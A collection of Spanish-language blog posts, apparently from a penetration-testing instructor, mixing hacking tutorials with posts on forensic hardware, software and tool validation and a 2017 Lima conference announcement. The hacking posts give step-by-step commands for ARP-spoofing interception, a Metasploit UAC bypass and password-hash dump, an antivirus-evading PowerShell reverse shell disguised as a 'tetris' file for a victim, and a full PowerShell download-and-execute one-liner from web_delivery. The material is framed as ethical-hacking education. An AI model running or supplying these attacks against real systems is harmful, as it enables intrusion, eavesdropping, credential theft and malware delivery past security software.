Captura de Paquetes y Ataques de Hombre en el Medio

Body

Una técnica la cual puede ser ventajosa para los profesionales en hacking ético y pruebas de penetración, es vigilar o capturar el tráfico de la red. Las capturas de paquetes son como las escuchas telefónicas. Una escucha telefónica registra aquello lo cual una persona habla en el teléfono, una captura de paquetes registra todo aquello lo cual la computadora “habla” sobre el cable de red. Esto podría incluir nombres de cuentas, contraseñas, entre otra información

Un ataque de Hombre en el Medio o por sus siglas en idioma inglés (MiTM), por ejemplo permite situar al atacante entre un sistema objetivo y el encaminador. De esta manera, se visualizará todo el tráfico proviniendo y dirigiéndose desde / hacia el sistema objetivo. Todo el tráfico desde el sistema objetivo dirigido hacia Internet, es primero encaminado hacia la máquina del atacante, el cual hace la captura, para luego reenviarla hacia la red. Toda la información proviniendo desde Internet hacia la máquina objetivo, es nuevamente encaminada primero a través de la máquina del atacante, nuevamente con la posibilidad de revisarla, para luego reenviarla hacia el sistema objetivo.

Con un ataque de Hombre en el Medio, el atacante se inserta a si mismo en el medio de la ruta correspondiente a una comunicación normal, y puede copiar todo aquello lo cual las partes en comunicación envían y reciben desde Internet.

Esto puede ser realizado modificando las tablas ARP (Address Resolution Protocol), sobre el encaminador y el sistema objetivo. La tabla ARP le indica al sistema cual dirección MAC física una dirección IP actualmente tiene. De tal manera un atacante puede indicar a la máquina objetivo él es el encaminador hacia Internet, e indicarle al encaminador él es el sistema objetivo, colocándolo en el medio del flujo de comunicación.

Para la siguiente demostración se utilizará la herramienta “arpspoof” para crear un ataque de hombre en el medio.

Se puede modificar fácilmente las tablas ARP con la herramienta “arpspoof”. Pero primero se necesita habilitar el reenvío IP.

# echo 1 > /proc/sys/net/ipv4/ip_forward

Se ejecuta la herramienta “arpspoof”, con la opción “-i” para definir la interfaz de red a utilizar, y la opción “-t” para definir la dirección IP correspondiente al sistema objetivo, finalmente la dirección IP correspondiente al encaminador.

# arpspoof -i eth0 -t 192.168. 0.64 192.168 .0.1

En una segunda terminal, se escribe un comando similar, pero esta vez definiendo en la opción “-t” la dirección IP correspondiente al encaminador.

# arpspoof -i eth0 -t 192.168 .0.1 192.168. 0.64

Con la ejecución de estos dos comandos, la herramienta “arpspoof” empezará a enviar las direcciones MAC modificadas. Ahora es momento de visualizar aquello factible de ser capturado desde el sistema objetivo.

La herramienta “urlsnarf” permite husmear todas las peticiones HTTP. Se ejecuta la herramienta utilizando la opción “-i” para definir la interfaz de red.

En la terminal se mostrará parte de la navegación web realizada por un usuario del sistema objetivo. Esto permite al atacante visualizar las direcciones de los sitios webs visitados. Se debe mencionar, “urlsnarf” no desencripta o descifra comunicaciones, para esto se requiere utilizar otras herramientas.

# urlsnarf -i eth0

La herramienta de nombre “Driftnet” permite vigilar tráfico de red, para luego extraer y mostrar las imágenes JPG y GIF. También puede extraer datos de audio MPEG desde la red, para luego reproducirlos.

Se ejecuta la herramienta “Driftnet” con la opción “-i” para definir la interfaz de red. En una nueva ventana se mostrarán paulatinamente las imágenes siendo capturadas por la herramienta.

# driftnet -i eth0

En las dos demostraciones realizadas se comprueba la posibilidad para un atacante de interceptar las comunicaciones, y visualizar para el primer caso, las direcciones de los sitios web visitados, y para el segundo caso visualizar las imágenes contenidas en los sitios web visitados. De hecho el tráfico podría contener información más sensible.

Para detener el ataque, en las dos terminales se debe presionar la combinación de teclas “control” y “c”.

Fuentes:

https://linux.die.net/man/8/arpspoof
https://linux.die.net/man/8/urlsnarf
https://github.com/deiv/driftnet

Recuperar Archivos Borrados desde un Sistema Remoto

Body

Habiendo obtenido acceso de nivel “System” en el sistema comprometido. Existe disponible un módulo el cual permite recuperar archivos, los cuales han sido borrados en el dispositivo de almacenamiento sobre el sistema remoto. El script de nombre “post/windows/gather/forensics/recovery_files” permite recuperar los archivos borrados por el usuario. Esto puede ser muy útil, pues los archivos borrados podrían contener información de interés, ya sea para el ámbito forense o de pruebas de penetración. Archivos del sistemas y registros de eventos, información de cuentas, y documentos importantes son sólo un pequeño ejemplo de aquello lo cual podría ser recuperado.

meterpreter > background
msf exploit(bypassuac) > use post/windows/gather/forensics/recovery_files
msf post(recovery_files) > info

Este módulo requiere se tenga una sesión previamente abierta sobre el objetivo de evaluación, el cual se desea verificar. Una vez obtenida la sesión remota, se manda a segundo plano la sesión pertinente, para luego configurar las opciones del módulo. Como la unidad donde buscará archivos borrados y la sesión sobre la cual se ejecutará.

msf post(recovery_files) > set DRIVE C:
msf post(recovery_files) > set SESSION 2
msf post(recovery_files) > run

Ejecutado el módulo, se pueden visualizar como se enumeran los archivos borrados. En caso se requiriese únicamente recuperar archivos de algún formato definido, simplemente se debe definir la variable de nombre “FILES”.

Al finalizar el proceso, y dado el hecho la variable “FILES” no ha sido definida, únicamente se enumerarán los archivos borrados desde el MFT.

Ahora se procede a definir la variable de nombre “FILES”, para intentar recuperar archivos de imagen en formato PNG.

msf post(recovery_files) > set FILES png
msf post(recovery_files) > run

Los archivos recuperados son almacenados en el directorio “/root/.msf4/loot/”. Si se ingresa a este directorio, se pueden encontrar los archivos y abrirlos. Este es un directorio oculto, de tal manera para visualizarlo a través de una interfaz gráfica, se debe definir específicamente la ubicación.

Fuentes:

https://www.rapid7.com/db/modules/post/windows/gather/forensics/recover…
https://github.com/rapid7/metasploit-framework

Escalar Privilegios en Windows Evadiendo UAC

Body

El usuario Administrador en Windows tiene mucha autoridad, pero existen algunas cosas las cuales el Administrador no puede hacer. El usuario “root” en Linux es el usuario con nivel de “dios”, y en Windows el usuario “System” es la cuenta super usuario. UAC o por su traducción al idioma español es Control para el Acceso del Usuario parecía ser una molestia en la versión anterior de Windows, y muchas empresas simplemente la desactivaron. UAC funciona muy bien en Windows 7 y versiones posteriores, además su utilización incluso en los ajustes de seguridad más bajos previene muchos tipos de ataques los cuales funcionaban en Windows XP.

Incluso si se obtiene una sesión con nivel de “Administrador” en Metasploit Framework. UAC prevendrá el realizar ciertas cosas, como obtener los hashes de las contraseñas. Pero existe un módulo para evadir UAC en Meterpreter, el cual permite evadir la restricción y obtener el nivel de “System”, si la cuenta de usuario comprometida es “Administrador”.

Se inicia con una sesión Meterpreter en un sistema Windows 7, y un usuario con los privilegios de administrador.

Muchas herramientas en Metasploit Framework necesitan acceso con nivel de “System” para funcionar correctamente. El problema es debido a la característica de seguridad UAC de Windows el cual bloquea los intentos de ejecutar programas a un nivel elevado de seguridad. El módulo para evadir UAC en Metasploit Framework toma una sesión remota con un usuario el cual tiene privilegios de “Administrador”, y crear una nueva sesión la cual puede ser elevada hacia el nivel de “System” con el comando “getsystem”. El módulo para evadir UAC ha cambiado, y algunas veces se menciona ya no es funcional. De hecho funciona a menos un antivirus lo bloquee. Simplemente funciona de manera diferente.

Iniciado con una sesión activa, se procede a mandar la sesión a segundo plano.

meterpreter > background
msf exploit(handler) > sessions

Se utiliza el módulo para evadir UAC. Este módulo intentará evadir UAC de Windows utilizando un certificado publicador de confianza a través de un proceso de inyección. Esto desplegará una segunda shell la cual tendrá desactivada UAC.

msf exploit(handler) > use exploit/windows/local/bypassuac

Se ajustan las opciones adecuadas para ejecutar el módulo.

msf exploit(bypassuac) > set SESSION 1
msf exploit(bypassuac) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(bypassuac) > set LHOST 192.168. 0.X
smsf exploit(bypassuac) > set LPORT 7777
msf exploit(bypassuac) > exploit

Se ha creado y conectado hacia esta sesión en Meterpreter. Se ejecuta en comando “getsystem” para elevar privilegios.

meterpreter > getsystem
meterpreter > getuid

Ahora se tienen privilegios con nivel de “System” sobre un el sistema Windows. Se puede ver el usuario era de hecho un miembro del grupo “Administrador”. Funcionó la evasión UAC y una nueva sesión se crea. Ahora elevada la cuenta desde el nivel del usuario “Administrador” hacia la cuenta del nivel “System”, se puede acceder hacia áreas de Windows las cuales están normalmente protegidas. Por ejemplo se pueden volcar los hashes de las contraseñas del sistema.

meterpreter > run post/windows/gather/hashdump

Fuentes:

https://github.com/rapid7/metasploit-framework
https://technet.microsoft.com/en-us/library/cc731416(v=ws.10).aspx
https://www.rapid7.com/db/modules/post/windows/gather/hashdump

Evadir un Antivirus de Windows con Veil-Evasion

Body

Muchas personas tienen la errada percepción de si utilizan un Antivirus o Firewall, están generalmente a salvo de atacantes maliciosos. Pero la verdad esta alejada de esto. “Veil-Evasion” genera payloads para shells remotos, los cuales pueden evadir algunos programas antivirus actuales.

Una parte de las pruebas de penetración es pasar a los molestos antivirus. El utilizar Veil-Evasion es una manera de lograr esto. Muchos programas antivirus funcionan por coincidencia de patrones o firmas. Si un programa se parece a un malware programado para verse como tal, lo atrapa. Si el archivo maliciosos tiene una firma la cual el antivirus no ha visto antes, muchos diligentemente dirán el archivo está limpio y no es una amenaza. Si se puede cambiar o enmascarar la firma del malware, o una shell remota en este caso, entonces muy probablemente un antivirus permitirá ejecutarlo, y el atacante malicioso obtendrá una conexión remota hacia el sistema.

Veil-Evasion es un generador de payloads o “cargas útiles”. Toma un payload estándar de Metasploit Framework, y a través de un programa similar a Metasploit permite crear varios payloads, los cuales en muchos casos podrían evadir antivirus.

Se ejecuta Veil-Evasion.

# veil-evasion

Lo primero a realizar será listar los “payloads” disponibles.

[menu>>]: list

Se utilizará un payload en “PoweShell”. Para utilizar el payload se debe indicar el número del payload. En este caso corresponde a “powershell/meterpreter/rev_tcp”.

[menu>>]: use 24

Las opciones son muy similares a las presentadas en Metasploit Framework. En este caso se define la dirección IP y el número de puerto hacia donde se conectará la victima.

[powershell/meterpreter/rev_tcp]: set LHOST 192.168.0.46
[powershell/meterpreter/rev_tcp]: set LPORT 1234

Se procede a generar la shellcode con las opciones seleccionadas previamente. Se define como nombre del archivo a crear “tetris”. El cual podría ayudar a confundir a una potencial victima, creyendo este archivo corresponde al conocido juego de nombre “tetris”.

Veil-Evasion ahora tiene todo lo necesario para realizar el ataque.

[powershell/meterpreter/rev_tcp]:

El payload y todos los archivos pertinentes para realizar el ataque se ubican dentro del directorio “/var/lib/veil-evasion/output/”. El archivo de nombre “/var/lib/veil-evasion/output/handlers/tetris_handler.rc” incluye las opciones pertinentes para configurar e iniciar un manejador en Metasploit Framework. De tal manera, cuando la victima ejecute el archivo malicioso, se puedan interactuar con una shell de Meterpreter.

# msfconsole -r /var/lib/veil-evasion/output/handlers/tetris_handler.rc

El archivo de nombre “/var/lib/veil-evasion/output/source/tetris.bat” debe ser enviado hacia la victima a través de cualquier medio o técnica. En este escenario se ha copiado el archivo hacia el directorio web de Kali Linux, para luego ser descargado en la víctima.

En la máquina Windows de la victima se procede a descargar y ejecutar el archivo malicioso. El Cual se ejecuta exitosamente aunque la protección en tiempo real de “Microsoft Security Essentials” está activo y actualizado.

Dada la ejecución exitosa del archivo malicioso se obtiene una sesión de Meterpreter, y de esta manera se está en la capacidad de controlar remotamente el sistema de la víctima

Veil-Evasion es parte de Veil-Framework, el cual contiene varias herramientas útiles adicionales para los profesionales en pruebas de penetración y hacking ético. Se sugiere explorar las herramientas adicionales de Veil-Framework. También Veil es constantemente actualizado con nuevas funcionalidades, por tal motivo se deben de revisar el sitio web por actualizaciones y su información más reciente.

Fuentes:

https://github.com/Veil-Framework/Veil-Evasion
https://github.com/rapid7/metasploit-framework

Software para Forense Digital

Body

Existe actualmente en el mercado, una amplia diversidad de productos software para forense digital. Algunas son herramientas genéricas las cuales proporcionan una variedad de funciones. Otras son más enfocadas en servir a un propósito más limitado. Estas aplicaciones tienden a enfocarse en un tipo muy específico de evidencia, por ejemplo correo electrónico o Internet.

Cuando se selecciona software, la elección necesita ser hecha entre ir con herramientas open source o productos comerciales. Existen ventajas y desventajas en ambos. Factores como el costo, funcionalidad, capacidades, y soporte son algunos de los criterios a ser utilizados para hacer esta decisión.

Una de las distribuciones forenses más populares es SIFT (SANS Investigative Forensic Toolkit). SIFT es una distribución forense open source poderosa y libre. Esta construido sobre el sistema operativo Ubuntu Linux. Siendo capaz de reconstruir archivos como también analizar sistemas de archivos, historial web, papelera de reciclaje y más. También puede analizar tráfico de red y memoria volátil. También puede generar cronologías, los cuales pueden ser inmensamente útiles durante una investigación. SIFT soporta los sistemas de archivos; MSDOS, FAT, VFAT, NTFS (Windows), HSF (Mac), UFS (Solaris) y EXT 2/3/4 (Linux).

Entre las herramientas comerciales, dos de las herramientas de software más populares son Forensics Toolkit de AccesData y Encase Forensics de Guidence Software. Ambas son excelentes, y pueden facilitar los análisis, además de hacerlos más eficientes. Estas aplicaciones tienen capacidades similares a una cuchilla suiza. Pues realizan una diversidad de tareas, como; búsquedas, análisis de correos electrónicos, ordenamiento, reporte, romper contraseñas, etc.

Las herramientas de búsqueda en estos productos son especialmente poderosas, y proporciona a los profesionales forenses capacidades para detallar con precisión la información buscada, como por ejemplo; direcciones de correo electrónico, nombres, número de teléfono, palabras clave, direcciones web, tipos de archivos, rangos de fechas.

Así como estas herramientas son muy útiles, también tienen algunas limitaciones. La realidad es no existe una única herramienta la cual haga de todo. Por esta razón, los laboratorios necesitan tener una diversidad de herramientas disponibles.

Cada día llegan más herramientas específicas al mercado. Estas herramientas se enfocan en un aspecto de la evidencia digital, como evidencia de correo electrónico o basada en web. Estas pueden proporcionar algunas capacidades adicionales no encontradas en herramientas multipropósito.

Muchos proveedores de software forense proporcionan tutoriales en video o demostraciones de sus productos. Esto puede ser una gran fuente de información adicional. Lo cual se encuentra típicamente en su sitio web o son enviadas bajo solicitud.

Es importante considerar lo siguiente sobre la dependencia de las herramientas. Las herramientas forenses basadas en una Interfaz Gráfica de Usuario (GUI), pueden convertirse en una muleta. Las herramientas de “pulsar el botón” pueden hacer más eficientes los análisis, pero no eximen al profesional forense de responsabilidad para comprender lo ocurriendo debajo de la superficie. Los profesionales forenses necesitan entender no únicamente lo hecho por la herramienta, sino también como los artefactos en cuestión son creados.

Fuentes:

https://digital-forensics.sans.org/community/downloads
http://www.accessdata.com/products-services/forensic-toolkit-ftk
https://www.guidancesoftware.com/encase-forensic

Hardware para Forense Digital

Body

Existen muchas herramientas hardware diseñadas y construidas específicamente para el forense digital. Algunas de estas herramientas incluyen dispositivos para la replicación, dispositivos para la adquisición desde teléfonos celulares, bloqueadores de escritura, dispositivos portátiles de almacenamiento, adaptadores, cables, y más.

Como se podría esperar, el forense digital es altamente dependiente de una diversidad de hardware como PCs, servidores, bloqueadores de escritura, kits para teléfonos celulares, cables, etc.

Las computadoras son la columna vertebral de cualquier laboratorio forense digital. Un profesional forense necesitará la mejor estación de trabajo factible de adquirir. Los análisis forenses requieren mucho poder de cómputo. Estos trabajos pueden incluso saturar los mejores sistemas, y traer abajo aquellos quienes no estén a la altura. Una buena máquina para realizar análisis forense debe tener múltiples procesadores multi núcleo, con tanta memoria RAM como puede ser posible (más es lo mejor), discos duros rápidos y de gran tamaño.

Los fabricantes de software proporcionan listas detalladas sobre los requerimientos de hardware mínimos y sugeridos. El ir por debajo de este mínimo debe ser asumido como un riesgo. Para obtener una mejor comprensión, siempre se sugiere revisar esta información.

Las especificaciones mínimas y recomendadas podrían variar con cada componente, pero basta decir nunca será suficiente memoria RAM o poder de cómputo. Algunos componentes podrían ser instalados también en máquinas separadas. Así mismo los requerimientos mínimos y recomendados podrían cambiar dependiendo de cual configuración a utilizar.

Los profesionales forenses frecuentemente se enfrentan con cantidades masivas de datos. Como tal, los laboratorios forenses necesitan tener la capacidad para almacenar cantidades voluminosas de datos. Con el creciente incremento de estas capacidades, es fácil percibir el almacenamiento es una preocupación importante.

El forense digital ya no es algo centrado en una PC. Dispositivos de pequeña escala como teléfonos celulares o unidades GPS, están siendo analizados constantemente en los laboratorios a nivel mundial. Estos dispositivos requieren hardware diferente al utilizado con laptops y computadoras de escritorio. Cuando se trata con teléfonos celulares, es crítico también tener los cables adecuados. A diferencia de las computadoras, los dispositivos móviles no necesariamente tienen una estandarización en lo referente a los conectores y cables. El laboratorio necesita tener una amplia selección de cables a disposición, para abarcar la amplia diversidad de dispositivos. Afortunadamente los fabricantes de harware forense móvil proporcionan muchos de los cables requeridos.

Muchas empresas hacen dispositivos de replicación por harware. Como se conoce, una réplica forense, es una copia de “flujo de bits” de una parte particular de un medio, como un disco duro. Estas herramientas pueden realmente acelerar el proceso, replicando varios discos a la vez. También proporcionan protección contra escritura, autenticación por hash, sanitización de la unidad, rastro para auditoría, y más.

Existen también kits muy útiles cuando se trabaja fuera del laboratorio forense. Estos kits están previamente cargados con todo aquello necesario por un profesional forense, para recolectar evidencia digital. Estos kits también contienen artículos como lapiceros, cámaras digitales, dispositivos de almacenamiento limpios, bolsas de evidencia, cinta para evidencia, formularios de reporte, marcadores permanentes, etc.

Fuentes:

http://accessdata.com/products-services/forensic-toolkit-ftk
https://www.cellebrite.com/en/products/ufed-ultimate/

Selección de Herramientas Forenses

Body

Las herramientas forenses hacen el trabajo mucho más eficiente o incluso posible. Existen herramientas para propósitos específicos, como también herramientas con amplias funcionalidades. Estas pueden venir en la forma ya sea de hardware o de software. Pueden ser también herramientas comerciales las cuales deben ser compradas, o también herramientas open source, las cuales están libremente disponibles. Existen ventajas y desventajas en todas ellas. Se debe tener en mente lo siguiente; ninguna herramienta forense hace todo o hace todo excesivamente bien. Como tal, una buena práctica es tener varias herramientas disponibles. El utilizar varias herramientas es también una manera adecuada de validar los hallazgos. Los mismos resultados, con dos diferentes herramientas, incrementan significativamente la fiabilidad de la evidencia.

El mercado de herramientas forenses presume de un gran número de productos, con un mayor despliegue todo el tiempo. ¿Cómo sabe el profesional forense cuales herramientas son fiables y cuales no?. ¿Cómo deben validarse estas herramientas?. El Instituto Nacional de Estándares y Tecnologías; por sus siglas en ingles NIST, y el Instituto Nacional de Justicia, por sus siglas en ingles NIJ, han dado un gran paso para ayudar a responder estas y otras preguntas.

NIST tiene el Proyecto para Pruebas de Herramientas Forenses, CFTT por sus siglas en inglés, el cual establece una metodología para probar herramientas de software para forense de computadoras, mediante el desarrollo de especificaciones generales de las herramientas, procedimientos de prueba, criterios de prueba, conjunto de pruebas, y pruebas de hardware.

Así mismo el Proyecto para Pruebas Federadas, es una ampliación del programa CFTT, para proporcionar a los investigadores forenses digitales y laboratorios, con materiales para la prueba de las herramientas, y para apoyar reportes compartidos de pruebas. El objetivo de las pruebas federativas es ayudar a los investigadores forenses digitales a probar las herramientas utilizadas en los laboratorios, y permitir compartir los resultados de las pruebas dentro de la comunidad forense digital.

Cada herramienta, ya sea hardware o software, debe ser validada antes de ser utilizada en casos particulares, así como en cualquier momento en el cual se modifique o actualice. Por ejemplo, al igual a otro software con el cual se está familiarizado, el software forense se actualiza periódicamente. Después de cada actualización, la herramienta debe validada nuevamente. La validación también es útil en los juzgados, lo cual respalda la validez de las resultados obtenidos por las herramientas forenses.

Fuentes:

https://www.cftt.nist.gov/
https://www.cftt.nist.gov/federated-testing.html
https://www.nist.gov/programs-projects/computer-forensics-tool-testing-…

8.8 Lucky Perú

Body

El día Viernes 20 de Octubre del año 2017 estaré dando una conferencia en la ciudad de Lima, Perú sobre "Forense Digital a un Fraude Electrónico Bancario", el cual se dictará desde las 3:30 pm hasta las 4:30 pm, en las instalaciones del Hotel Atton San Isidro. Esto con motivo de realizarse 8.8 Lucky Perú.

8.8 Lucky Perú es un evento donde las personas interesadas en seguridad de la información: CIOs, CTOs, CISOs, ISOs, sysadmins, arquitectos de sistemas, desarrolladores de sistemas, administradores de red, especialistas en seguridad, consultores, analistas de riesgo, administradores de sistemas, estudiantes, hackers, geeks y muchos otros pueden compartir conocimientos y experiencias en un ambiente distendido y confortable. El objetivo principal es compartir experiencias, conocer las últimas técnicas utilizadas, los últimos tipos de ataques registrados, la forma de concretarse y cómo se repelen.

8.8 Lucky Perú contará con la participación de profesionales peruanos y extranjeros reconocidos a nivel nacional e internacional, como Gabriel Bergel, Juampa Rodríguez, Cesar Farro, Alonso Caballero, Ernesto Landa Romero, Augusto Morales y Juan Carlos Izquierdo.

Las conferencias a desarrollarse son las siguientes:

  • ¿Soy Un Cyborg?
  • Hacker Vs CISO
  • Evadiendo Controles En Escenario Industrial
  • Aplicando Inteligencia Artificial/Machine Learning Para Detectar Trafico Anómalo/Malware Y Análisis De Sentimientos
  • Forense Digital De Un Fraude Electrónico Bancario
  • El Estado De La Ciberseguridad Industrial En Infraestructuras Criticas En El Perú
  • Enhancing Mobile Workflow Execution By Modeling Flexible Security Controls
  • Evasión Y Persuasión: Letal Combinación

Las entradas para participar en 8.8 Lucky Perú están a la venta en TeleTicket. El registro puede completarse pagando S/. 65 Soles o $ 20 Dólares.

Fuentes:

https://www.8dot8.org/pe
https://www.8dot8.org/pe/2017
https://www.8dot8.org/pe/agenda

Explotar un Sistema Windows utilizando el módulo web_delivery de MSF

Body

El módulo de nombre “web_delivery” de Metasploit Framework, rápidamente activa un servidor web el cual sirve un payload o carga útil. El comando proporcionado iniciará un interprete en un lenguaje de script especificado, para luego descargar y ejecutar el payload. El principal propósito de este módulo es rápidamente establecer una sesión sobre una máquina objetivo, cuando el atacante manualmente escriba el comando por si mismo, por ejemplo a través de una inyección de comandos, sesión RDP, acceso local, o puede ser una ejecución de comandos remotos. Este vector de ataque no escribe hacia el disco, de tal manera no activará soluciones antivirus, y podría permitir el escalado de privilegios proporcionado por Meterpreter. Cuando se utiliza en objetivos PSH, se debe asegurar la arquitectura corresponda con la computadora objetivo, o utilizar SYSWOW64 powershell.exe para ejecutar cargas x86 sobre máquinas x64.

Se inicia la consola de Metasploit Framework para luego definir la utilización del módulo pertinente.

> search web_delivery
> use exploit/multi/script/web_delivery

Se definen las opciones del módulo, basándose en el escenario de evaluación.

> set SRVHOST Direccion_IP
> set SRVPORT 80
> set URIPATH /
> set LHOST Direccion_IP

Se modifica el payload por defecto a utilizar por el módulo, para luego proceder a definir el “target” u objetivo de explotación. De las tres opciones, Python, PHP, y PSH (PowerShell), se utilizará este exploit para evaluar un sistema Windows, de tal manera se utilizará la opción 2.

> set PAYLOAD windows/meterpreter/reverse_tcp
> show options
> show targets
> set target 2

Al ejecutar el exploit, se inicia un servidor en atención en Kali Linux, el cual espera por una conexión entrante. Todo lo necesario a continuación es ejecutar el comando PowerShell generado en el sistema objetivo.

En el Sistema Windows se inicia un prompt de comandos, para luego pegar y ejecutar el comando en PowerShell proporcionado por Metasploit Framework.

powershell.exe -nop -w hidden -c $l=new-object net.webclient;$l.proxy=[Net.WebRequest]::GetSystemWebProxy();$l.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $l.downloadstring('http://192.168.0.46/');

Después de unos segundos se tiene una sesión abierta de Meterpreter en el sistema objetivo, teniendo la capacidad de controlarlo remotamente.

> sessions -i 1
> sysinfo

Fuentes:

https://www.rapid7.com/db/modules/exploit/multi/script/web_delivery

Búsquedas en Shodan utilizando Metasploit Framework

Body

Las capacidades para la búsqueda en Shodan están incluidas dentro de Metasploit Framework. Únicamente es necesario registrar una cuenta de usuario gratuita en Shodan, para obtener una llave API desde su sitio web. El utilizar una llave API permitirá automatizar las búsquedas en Shodan con Metasploit Framework.

El módulo de nombre “auxiliary/gather/shodan_search” utiliza la API de Shodan para realizar las búsquedas. Los resultados del módulo son mostrados en pantalla y pueden ser guardados hacia un archivo o la base de datos de Metasploit Framework. Anotar lo siguiente; los filtros de Shodan (por ejemplo puertos, nombres de host, sistema operativo, geolocalización, ciudad) pueden ser utilizados en las consultas, pero existen limitaciones cuando son utilizados con una clave API gratuita.

Se inicia Metasploit Framework, para luego obtener más información del módulo utilizando el comando “info”.

> info auxiliary/gather/shodan_search

Se procede a indicar la utilización del módulo en Metasploit Framework utilizando el comando “use”. Para luego mostrar sus opciones.

> use auxiliary/gather/shodan_search

Se procede a definir la API de Shodan en la variable pertinente utilizando el comando “set”.

> set SHODAN_APIKEY LLAVE_API

Se procede a definir la variable “QUERY” a “nginx” (Buscar servidores nginx). Para luego ejecutar el módulo utilizando el comando “run”.

Este módulo de Metasploit Framework únicamente muestra la primera página por defecto.

Si se requiere filtrar por palabras clave y obtener más páginas de respuesta, se necesita comprar una llave API desbloqueada.

Fuentes:

https://www.rapid7.com/db/modules/auxiliary/gather/shodan_search
https://www.shodan.io
https://developer.shodan.io/api